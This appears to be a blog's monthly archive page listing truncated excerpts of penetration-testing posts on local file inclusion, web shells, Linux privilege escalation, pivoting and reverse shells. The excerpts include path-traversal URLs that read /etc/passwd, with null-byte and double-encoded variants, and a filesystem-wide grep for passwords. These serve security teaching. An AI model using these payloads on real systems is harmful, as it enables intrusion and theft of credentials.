Monthly Archive: September 2019

CHEATSHEET – LFI & RCE & WEBSHELLS

Basic LFI In the following examples, we include the /etc/passwd file, check the Directory & Path Traversal chapter for more interesting files. http://example.com/index.php?page=../../../etc/passwd Null byte ⚠️ In versions of PHP below 5.3.4 we can terminate with null byte. http://example.com/index.php?page=../../../etc/passwd%00 Double encoding http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00...

WebShells & Exploitation – LFI to RCE

Commands can be sent to the web-shell using various methods, with HTTP POST request being the most common. However, hackers are not exactly people who play by the rules. The following are a few of the possible tricks...

Web Shells & Exploitation Fundamentals

A web-shell is a malicious script used by an attacker with the intent to escalate and maintain persistent access on an already compromised web application. A web-shell itself cannot attack or exploit a remote vulnerability, so it is...

Linux Basic Enumeration

This blog is largely forked from g0tmi1k’s blog https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Thanks, g0tmi1k, for your amazing contribution to the industry. Operating System What’s the distribution type? What version? cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release #...

Linux Privilege Escalation – Part 2

In this blog, we will go through detailed commands for escalating privileges and finding out which files and folders a user can access. Files containing passwords grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null find . -type f...

Linux Privilege Escalation – Part 1

In this blog, we will discuss different Linux privilege escalation techniques and methodologies. Tools LinuxSmartEnumeration – Linux enumeration tools for pentesting and CTFs wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh ./lse.sh -l1 # shows interesting information that...

Searchsploit Cheat Sheet

Searchsploit is an exploit search tool by Offensive Security, Unix Ninja & G0tmi1k. It allows you to take a copy of Exploit Database with you. SearchSploit gives you the power to perform detailed off-line searches through your locally checked-out...

Pivoting & Port forwarding

This blog will focus on port forwarding concepts. Here are some methods we will follow in this blog: Windows Netsh SSH proxychains Web Socks Metasploit sshuttle chisel Rpivot Plink Ngrok Windows Netsh Port Forwarding netsh interface...

Reverse Shell Cheat Sheet

This is a detailed cheat sheet on how to get a reverse shell via various methods. Here is the list of methods: Bash TCP BASH UDP Python SOCAT Php Telnet Perl Ruby Golang Netcat Ncat Openssl awk Powershell...